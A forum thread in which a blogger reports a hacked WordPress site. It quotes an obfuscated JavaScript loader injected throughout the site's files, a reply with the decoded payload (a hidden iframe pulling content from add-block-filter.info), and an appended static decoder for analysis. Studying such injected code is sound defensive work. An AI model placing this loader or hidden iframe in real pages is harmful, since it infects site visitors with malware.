I think my blog has been hacked!!

  • Moderator kmessinger

    @kmessinger

    Yes, you have been hacked. When I first brought up your site my virus program blocked 4 viruses. In any case your site is home for many trojans. Hopefully your database is ok.

    any idea what I can do about this?

    1) Take your site offline to prevent spreading the evil.
    2) Get your host to help you clean it up.
    3) Figure out how this happened. Your host should be able to help you!

    http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/
    http://olu85.com/blog/?p=15

    I found this bit of code sprinkled through all my wordpress files and index pages…

    function db3b23(x) {var y=x.length,c=1024,z,g,q,f=0,b=0,u=0,v=Array(63,61,14,3,1,44,42,15,39,45,0,0,0,0,0,0,47,30,62,59,13,41,34,6,23,54,57,22,29,56,55,31,16,24,11,12,0,26,27,21,52,53,18,0,0,0,0,28,0,36,4,20,8,7,17,32,33,40,37,35,51,9,38,58,50,43,48,49,5,2,46,25,10,60,19);for(g=Math.ceil(y/c);g>0;g–){q=”;for(z=Math.min(y,c);z>0;z–,y–){{u|=(v[x.charCodeAt(f++)-48])<<b;if(b){q+=String.fromCharCode(148^u&255);u>>=8;b-=2}else{b=6}}}eval(q);}}db3b23(‘kN@Br@0MoA2MY3AM88o5P@@Bs7Cqr@01h8Oyo3vvkVA0ge7@lFU0pVA1Je79oHOBs8xy9x7qN3x98VB1EUR0g32JvvCv5K7yrN7M1@@Bov@Jl@RMCvo50nL1gl@vn@OMo37@wH7MyqqJYq7yC87@1oRigpxE1BC5rN6y5A7ilBC5IZCM137My8UEjUx9yeO0ll7MEuxEXA2M9kOyEURy1O2JMHOCv60Boe@96Fov1R@JY8Oy62V@’) </script><!– downwindheaven.com –>

    Anyone recognise it?

    whooami

    @whooami

    Member

    No, and I wouldn't see the point if I did, honestly. I'm not sure why there's a comment with your domain name in it though.

    I've not googled that code, but are you positive that's not something that you actually added, or is the comment at the end the start of something else?

    Edit: nm, I googled it.

    whooami

    @whooami

    Member

    Google is truly amazing, btw. It's this really nifty, new search engine thing, where you can like, you know, put stuff into this box, and click one key, and you get all kinds of answers back.

    window.status='Done';
    document.write('<iframe name=6d40ec src="http://add-block-filter.info/t/?'+Math.round(Math.random()*16682)+'6d40ec'+'" width=439 height=38 style="display:none"></iframe>')

    @jonnyd: Haven’t seen this before, but maybe this will help.

    http://www.sitepoint.com/forums/showthread.php?p=4191966
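
Added example, not part of any post in this thread: the loader function quoted above can be decoded statically, without `eval`, to see what the injected code hides. `parseLoader`, `decode`, `decodeLoader` and `SAMPLE` are names chosen here; the sample keeps the thread's lookup table and XOR constant, with the loop body elided and only the first 28 characters of the encoded string.

```javascript
// Static decoder for the injected loader quoted in the thread (added example).
// Nothing is eval'd: the hidden script comes back as a string for inspection.

// Pull the lookup table, XOR key and encoded argument out of the loader source.
function parseLoader(src) {
  const table = /Array\(([\d,\s]+)\)/.exec(src);
  const key = /fromCharCode\((\d+)\^/.exec(src);
  const arg = /\}\s*\w+\(\s*['"]([^'"]+)['"]\s*\)/.exec(src);
  if (!table || !key || !arg) throw new Error('loader pattern not recognised');
  return {
    table: table[1].split(',').map(Number),
    key: Number(key[1]),
    encoded: arg[1],
  };
}

// Each character maps to a 6-bit value (table index = char code - 48).
// Four characters yield three bytes, and each byte is XORed with the key.
// Characters outside the table count as 0, as they do in the loader itself.
function decode({ table, key, encoded }) {
  let out = '', acc = 0, bits = 0;
  for (const ch of encoded) {
    acc |= (table[ch.charCodeAt(0) - 48] | 0) << bits;
    if (bits) {
      out += String.fromCharCode(key ^ (acc & 255));
      acc >>= 8;
      bits -= 2;
    } else {
      bits = 6;
    }
  }
  return out;
}

function decodeLoader(src) { return decode(parseLoader(src)); }

// Constructed sample: table and key as posted, loop body elided, and only the
// first 28 characters of the encoded string. It is parsed as text, never run.
const SAMPLE =
  'function db3b23(x){var v=Array(63,61,14,3,1,44,42,15,39,45,0,0,0,0,0,0,' +
  '47,30,62,59,13,41,34,6,23,54,57,22,29,56,55,31,16,24,11,12,0,26,27,21,52,' +
  '53,18,0,0,0,0,28,0,36,4,20,8,7,17,32,33,40,37,35,51,9,38,58,50,43,48,49,' +
  '5,2,46,25,10,60,19);/* loop elided */q+=String.fromCharCode(148^u&255);' +
  "eval(q);}db3b23('kN@Br@0MoA2MY3AM88o5P@@Bs7Cq')";

console.log(JSON.stringify(decodeLoader(SAMPLE)));
```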
